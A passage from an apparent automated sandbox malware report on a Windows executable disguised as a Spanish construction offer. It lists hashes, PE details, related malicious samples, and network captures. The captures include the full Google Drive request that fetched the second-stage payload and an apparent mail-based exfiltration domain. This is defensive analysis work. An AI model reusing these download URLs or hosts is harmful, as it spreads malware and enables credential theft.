                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .exe
                                  Warnings:
                                  Show All
                                  • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                  • TCP Packets have been reduced to 100
                                  • Excluded IPs from analysis (whitelisted): 20.54.122.82, 51.105.236.244, 20.82.210.154, 20.190.160.67, 20.190.160.132, 20.190.160.8, 20.190.160.71, 20.190.160.6, 20.190.160.73, 20.190.160.75, 20.190.160.69, 51.105.232.141, 52.109.12.19
                                  • Excluded domains from analysis (whitelisted): geo.clients.config.office.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, wdcp.microsoft.com, eur.clients.config.office.akadns.net, wd-prod-cp.trafficmanager.net, arc.msn.com, login.msa.msidentity.com, www.tm.a.prd.aadg.trafficmanager.net, prod.nexusrules.live.com.akadns.net, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, wdcpalt.microsoft.com, login.live.com, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, arc.trafficmanager.net, nexusrules.officeapps.live.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  18:40:56API Interceptor2551x Sleep call for process: RegAsm.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  185.156.219.141CONSTRUCCIONES Y SERVICIOS VAZQUESUR (OFERTA 222109).exeGet hashmaliciousBrowse

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    SOLTIAEStI0W00k1vtGet hashmaliciousBrowse
                                    • 185.75.12.231
                                    Hilix.x86Get hashmaliciousBrowse
                                    • 185.232.205.114
                                    2S8N5fDSRsGet hashmaliciousBrowse
                                    • 185.75.12.202
                                    4xLPiwsP67Get hashmaliciousBrowse
                                    • 185.75.12.238
                                    CONSTRUCCIONES Y SERVICIOS VAZQUESUR (OFERTA 222109).exeGet hashmaliciousBrowse
                                    • 185.156.219.141
                                    BcOfN2cD3eGet hashmaliciousBrowse
                                    • 185.75.12.231
                                    frosty.x86Get hashmaliciousBrowse
                                    • 185.232.205.115
                                    1-09-06).exeGet hashmaliciousBrowse
                                    • 185.156.219.31
                                    K6s3wEt8UaGet hashmaliciousBrowse
                                    • 185.163.175.17
                                    Lkl7AYHyuoGet hashmaliciousBrowse
                                    • 185.232.205.130
                                    QIJ16axeroGet hashmaliciousBrowse
                                    • 185.75.12.232
                                    SW4NudSk55Get hashmaliciousBrowse
                                    • 185.75.12.218
                                    Order List.exeGet hashmaliciousBrowse
                                    • 185.156.219.8
                                    z4zrCaJCJgGet hashmaliciousBrowse
                                    • 185.211.180.34
                                    SecuriteInfo.com..15404.exeGet hashmaliciousBrowse
                                    • 185.156.219.10
                                    SecuriteInfo.com.Trojan.DownLoader39.49149.23378.exeGet hashmaliciousBrowse
                                    • 185.156.219.10
                                    QVx9x58KuLGet hashmaliciousBrowse
                                    • 185.232.205.120
                                    gL430xl8lUGet hashmaliciousBrowse
                                    • 185.232.205.139
                                    DWG.exeGet hashmaliciousBrowse
                                    • 185.156.219.5
                                    Order Drawing.exeGet hashmaliciousBrowse
                                    • 185.156.219.5

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    37f463bf4616ecd445d4a1937da06e19FDVCyigTWH.exeGet hashmaliciousBrowse
                                    • 142.250.186.78
                                    • 142.250.185.65
                                    PO-003785GMHN.exeGet hashmaliciousBrowse
                                    • 142.250.186.78
                                    • 142.250.185.65
                                    cYKFZFK0Rg.exeGet hashmaliciousBrowse
                                    • 142.250.186.78
                                    • 142.250.185.65
                                    svchost.exeGet hashmaliciousBrowse
                                    • 142.250.186.78
                                    • 142.250.185.65
                                    T6zZFfRLqs.exeGet hashmaliciousBrowse
                                    • 142.250.186.78
                                    • 142.250.185.65
                                    InvPixcareer.-43329_20210927.xlsbGet hashmaliciousBrowse
                                    • 142.250.186.78
                                    • 142.250.185.65
                                    nY67wl47QZ.exeGet hashmaliciousBrowse
                                    • 142.250.186.78
                                    • 142.250.185.65
                                    OfE705GyPZ.exeGet hashmaliciousBrowse
                                    • 142.250.186.78
                                    • 142.250.185.65
                                    W7fb1ECIQA.exeGet hashmaliciousBrowse
                                    • 142.250.186.78
                                    • 142.250.185.65
                                    R9LbEnIk0s.exeGet hashmaliciousBrowse
                                    • 142.250.186.78
                                    • 142.250.185.65
                                    payment confirmation.exeGet hashmaliciousBrowse
                                    • 142.250.186.78
                                    • 142.250.185.65
                                    recital-239880844.xlsGet hashmaliciousBrowse
                                    • 142.250.186.78
                                    • 142.250.185.65
                                    Unreal.exeGet hashmaliciousBrowse
                                    • 142.250.186.78
                                    • 142.250.185.65
                                    Silver_Light_Group_DOC03027321122.exeGet hashmaliciousBrowse
                                    • 142.250.186.78
                                    • 142.250.185.65
                                    7XmWGse79x.exeGet hashmaliciousBrowse
                                    • 142.250.186.78
                                    • 142.250.185.65
                                    m5W1BZQU4m.exeGet hashmaliciousBrowse
                                    • 142.250.186.78
                                    • 142.250.185.65
                                    hHsIHUGICB.exeGet hashmaliciousBrowse
                                    • 142.250.186.78
                                    • 142.250.185.65
                                    NOgYb2fHbO.exeGet hashmaliciousBrowse
                                    • 142.250.186.78
                                    • 142.250.185.65
                                    VwDvbAowp0.exeGet hashmaliciousBrowse
                                    • 142.250.186.78
                                    • 142.250.185.65
                                    lXy3MnXJ83.exeGet hashmaliciousBrowse
                                    • 142.250.186.78
                                    • 142.250.185.65

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    \Device\ConDrv
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):30
                                    Entropy (8bit):3.964735178725505
                                    Encrypted:false
                                    SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                    MD5:9F754B47B351EF0FC32527B541420595
                                    SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                    SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                    SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview: NordVPN directory not found!..

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):6.300769509172339
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.15%
                                    • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe
                                    File size:102400
                                    MD5:991bee5a9edd18a183c900b7edeccefe
                                    SHA1:18189c5a9d3ab005df5426494e2016a5d64b8c72
                                    SHA256:e3c94531505c4a4d5bb35bb62e773676f7e9ab522111d930f02c3144c971414d
                                    SHA512:49a38be3d5d5fe4cdbb765c95ab455b1584e9ad7f28165ffe25a08f9fb9fa56a41354bdac74b77e42fe0ffdd64165d85b58f3817d5c4654e9a429de0be3f9109
                                    SSDEEP:1536:q1W8dYk9oHqzOMTkjBTJGUByj1x+amIBFOFWFJfc8b12r/:cGkRKB9JIjP+G4YcE27
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.......0...~...0.......0...Rich1...........PE..L...=.CV.................P...0...............`....@................

                                    File Icon

                                    Icon Hash:78f8d6d4ac88d0e2

                                    Static PE Info

                                    General

                                    Entrypoint:0x4012d4
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                    DLL Characteristics:
                                    Time Stamp:0x5643B13D [Wed Nov 11 21:21:01 2015 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:1eb0aaa4f15bbd841e91215ce68e26d2

                                    Entrypoint Preview

                                    Instruction
                                    push 00413AA8h
                                    call 00007F52D8BC73C5h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    xor byte ptr [eax], al
                                    add byte ptr [eax], al
                                    cmp byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    mov eax, 3817F674h
                                    inc esi
                                    inc esi
                                    movsb
                                    inc edi
                                    jl 00007F52D8BC73BDh
                                    inc edx
                                    sar dword ptr [ecx-38h], 1
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add dword ptr [eax], eax
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    or cl, ch
                                    adc dword ptr [ebx], eax
                                    dec ebx
                                    popad
                                    jc 00007F52D8BC7436h
                                    imul esi, dword ptr [edi], 00000000h
                                    add byte ptr [eax], al
                                    dec esp
                                    xor dword ptr [eax], eax
                                    add ebp, esp
                                    sal dword ptr [ebp+0F667C11h], cl
                                    inc eax
                                    nop
                                    stosb
                                    rol al, cl
                                    mov bl, 9Eh
                                    jc 00007F52D8BC7424h
                                    lea ebx, dword ptr [eax]
                                    push esp
                                    cmpsb
                                    cmpsd
                                    rol byte ptr [edi-78h], 00000000h
                                    outsd
                                    jp 00007F52D8BC740Dh
                                    push ecx
                                    cdq
                                    cmp cl, byte ptr [edi-53h]
                                    xor ebx, dword ptr [ecx-48EE309Ah]
                                    or al, 00h
                                    stosb
                                    add byte ptr [eax-2Dh], ah
                                    xchg eax, ebx
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x151840x28.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x170000x1cb0.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                                    IMAGE_DIRECTORY_ENTRY_IAT0x10000xdc.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x145580x15000False0.567685081845data6.68912233IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .data0x160000x9f40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                    .rsrc0x170000x1cb00x2000False0.263793945312data3.45953582589IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountry
                                    CUSTOM0x18b720x13eMS Windows icon resource - 1 icon, 16x16, 16 colorsEnglishUnited States
                                    CUSTOM0x185f40x57eMS Windows icon resource - 1 icon, 16x16, 8 bits/pixelEnglishUnited States
                                    CUSTOM0x180760x57eMS Windows icon resource - 1 icon, 16x16, 8 bits/pixelEnglishUnited States
                                    CUSTOM0x17f380x13eMS Windows icon resource - 1 icon, 16x16, 16 colorsEnglishUnited States
                                    RT_ICON0x178d00x668dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 252, next used block 65280
                                    RT_ICON0x175e80x2e8data
                                    RT_ICON0x174c00x128GLS_BINARY_LSB_FIRST
                                    RT_GROUP_ICON0x174900x30data
                                    RT_VERSION0x172300x260dataEnglishUnited States

                                    Imports

                                    DLLImport
                                    MSVBVM60.DLL_CIcos, _adj_fptan, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                    Version Infos

                                    DescriptionData
                                    Translation0x0409 0x04b0
                                    InternalNameKios2
                                    FileVersion1.00
                                    CompanyNameCelRox
                                    CommentsCelRox
                                    ProductNameCelRox
                                    ProductVersion1.00
                                    FileDescriptionCelRox
                                    OriginalFilenameKios2.exe

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 27, 2021 18:40:45.245691061 CEST49805443192.168.11.20142.250.186.78
                                    Sep 27, 2021 18:40:45.245769978 CEST44349805142.250.186.78192.168.11.20
                                    Sep 27, 2021 18:40:45.245992899 CEST49805443192.168.11.20142.250.186.78
                                    Sep 27, 2021 18:40:45.262797117 CEST49805443192.168.11.20142.250.186.78
                                    Sep 27, 2021 18:40:45.262871981 CEST44349805142.250.186.78192.168.11.20
                                    Sep 27, 2021 18:40:45.315491915 CEST44349805142.250.186.78192.168.11.20
                                    Sep 27, 2021 18:40:45.315680027 CEST49805443192.168.11.20142.250.186.78
                                    Sep 27, 2021 18:40:45.317759991 CEST44349805142.250.186.78192.168.11.20
                                    Sep 27, 2021 18:40:45.317981005 CEST49805443192.168.11.20142.250.186.78
                                    Sep 27, 2021 18:40:45.445339918 CEST49805443192.168.11.20142.250.186.78
                                    Sep 27, 2021 18:40:45.445396900 CEST44349805142.250.186.78192.168.11.20
                                    Sep 27, 2021 18:40:45.446125031 CEST44349805142.250.186.78192.168.11.20
                                    Sep 27, 2021 18:40:45.446281910 CEST49805443192.168.11.20142.250.186.78
                                    Sep 27, 2021 18:40:45.450453997 CEST49805443192.168.11.20142.250.186.78
                                    Sep 27, 2021 18:40:45.494018078 CEST44349805142.250.186.78192.168.11.20
                                    Sep 27, 2021 18:40:45.859410048 CEST44349805142.250.186.78192.168.11.20
                                    Sep 27, 2021 18:40:45.859464884 CEST44349805142.250.186.78192.168.11.20
                                    Sep 27, 2021 18:40:45.859606981 CEST44349805142.250.186.78192.168.11.20
                                    Sep 27, 2021 18:40:45.859726906 CEST49805443192.168.11.20142.250.186.78
                                    Sep 27, 2021 18:40:45.859772921 CEST49805443192.168.11.20142.250.186.78
                                    Sep 27, 2021 18:40:45.864562035 CEST49805443192.168.11.20142.250.186.78
                                    Sep 27, 2021 18:40:45.864605904 CEST44349805142.250.186.78192.168.11.20
                                    Sep 27, 2021 18:40:45.950925112 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:45.950993061 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:45.951159954 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:45.951745987 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:45.951797009 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:45.999356985 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:45.999613047 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.002377987 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.002590895 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.006864071 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.006902933 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.007524014 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.007702112 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.008150101 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.050035000 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.318367004 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.318605900 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.318605900 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.318665028 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.318798065 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.318809032 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.318886995 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.318932056 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.319014072 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.319130898 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.319339037 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.319664001 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.319787025 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.320235968 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.323021889 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.323312044 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.325764894 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.326131105 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.326189041 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.326421976 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.328690052 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.328953981 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.328994036 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.329067945 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.329113007 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.329169989 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.329222918 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.329241991 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.329263926 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.329349995 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.329401970 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.329457045 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.329603910 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.329695940 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.329742908 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.329752922 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.329884052 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.330404997 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.330594063 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.330652952 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.330718040 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.330760002 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.330921888 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.331247091 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.331408024 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.331450939 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.331604004 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.331643105 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.331795931 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.332098961 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.332259893 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.332284927 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.332309961 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.332534075 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.332779884 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.332974911 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.333034992 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.333079100 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.333122969 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.333231926 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.333719015 CEST44349806142.250.185.65192.168.11.20
                                    Sep 27, 2021 18:40:46.333893061 CEST49806443192.168.11.20142.250.185.65
                                    Sep 27, 2021 18:40:46.333949089 CEST44349806142.250.185.65192.168.11.20

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 27, 2021 18:39:45.727212906 CEST5902053192.168.11.201.1.1.1
                                    Sep 27, 2021 18:39:45.737236977 CEST53590201.1.1.1192.168.11.20
                                    Sep 27, 2021 18:39:45.870661974 CEST5656153192.168.11.201.1.1.1
                                    Sep 27, 2021 18:39:45.879906893 CEST53565611.1.1.1192.168.11.20
                                    Sep 27, 2021 18:40:36.276832104 CEST5417853192.168.11.201.1.1.1
                                    Sep 27, 2021 18:40:36.286340952 CEST53541781.1.1.1192.168.11.20
                                    Sep 27, 2021 18:40:45.222923040 CEST5746053192.168.11.201.1.1.1
                                    Sep 27, 2021 18:40:45.231147051 CEST53574601.1.1.1192.168.11.20
                                    Sep 27, 2021 18:40:45.905569077 CEST6135353192.168.11.201.1.1.1
                                    Sep 27, 2021 18:40:45.948853016 CEST53613531.1.1.1192.168.11.20
                                    Sep 27, 2021 18:42:22.172858953 CEST5745453192.168.11.201.1.1.1
                                    Sep 27, 2021 18:42:22.390193939 CEST53574541.1.1.1192.168.11.20
                                    Sep 27, 2021 18:43:43.148015976 CEST5899553192.168.11.201.1.1.1
                                    Sep 27, 2021 18:43:43.157627106 CEST53589951.1.1.1192.168.11.20
                                    Sep 27, 2021 18:43:43.605545044 CEST5712053192.168.11.201.1.1.1
                                    Sep 27, 2021 18:43:43.613998890 CEST53571201.1.1.1192.168.11.20
                                    Sep 27, 2021 18:45:21.102694035 CEST4923653192.168.11.201.1.1.1
                                    Sep 27, 2021 18:45:21.111541986 CEST53492361.1.1.1192.168.11.20

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Sep 27, 2021 18:40:45.222923040 CEST192.168.11.201.1.1.10xb511Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                    Sep 27, 2021 18:40:45.905569077 CEST192.168.11.201.1.1.10xdbaStandard query (0)doc-04-9c-docs.googleusercontent.comA (IP address)IN (0x0001)
                                    Sep 27, 2021 18:42:22.172858953 CEST192.168.11.201.1.1.10x7031Standard query (0)mail.quantgemfxinvest.comA (IP address)IN (0x0001)
                                    Sep 27, 2021 18:43:43.605545044 CEST192.168.11.201.1.1.10x81f1Standard query (0)clients.config.office.netA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Sep 27, 2021 18:40:45.231147051 CEST1.1.1.1192.168.11.200xb511No error (0)drive.google.com142.250.186.78A (IP address)IN (0x0001)
                                    Sep 27, 2021 18:40:45.948853016 CEST1.1.1.1192.168.11.200xdbaNo error (0)doc-04-9c-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                    Sep 27, 2021 18:40:45.948853016 CEST1.1.1.1192.168.11.200xdbaNo error (0)googlehosted.l.googleusercontent.com142.250.185.65A (IP address)IN (0x0001)
                                    Sep 27, 2021 18:42:22.390193939 CEST1.1.1.1192.168.11.200x7031No error (0)mail.quantgemfxinvest.comquantgemfxinvest.comCNAME (Canonical name)IN (0x0001)
                                    Sep 27, 2021 18:42:22.390193939 CEST1.1.1.1192.168.11.200x7031No error (0)quantgemfxinvest.com185.156.219.141A (IP address)IN (0x0001)
                                    Sep 27, 2021 18:43:43.157627106 CEST1.1.1.1192.168.11.200xff24No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                    Sep 27, 2021 18:43:43.613998890 CEST1.1.1.1192.168.11.200x81f1No error (0)clients.config.office.netgeo.clients.config.office.akadns.netCNAME (Canonical name)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • drive.google.com
                                    • doc-04-9c-docs.googleusercontent.com

                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.11.2049805142.250.186.78443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    TimestampkBytes transferredDirectionData
                                    2021-09-27 16:40:45 UTC0OUTGET /uc?export=download&id=1ycJKsjL72mds_kr72amoQuYUYdcifxy0 HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                    Host: drive.google.com
                                    Cache-Control: no-cache
                                    2021-09-27 16:40:45 UTC0INHTTP/1.1 302 Moved Temporarily
                                    Content-Type: text/html; charset=UTF-8
                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                    Pragma: no-cache
                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                    Date: Mon, 27 Sep 2021 16:40:45 GMT
                                    Location: https://doc-04-9c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8pgkjk8k3vc3ju64ugjuf54q6v6uu1oc/1632760800000/13596271228415839806/*/1ycJKsjL72mds_kr72amoQuYUYdcifxy0?e=download
                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                    Content-Security-Policy: script-src 'nonce-LfnreVAWCDRs+B4VvuQrCA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                    X-Content-Type-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    X-XSS-Protection: 1; mode=block
                                    Server: GSE
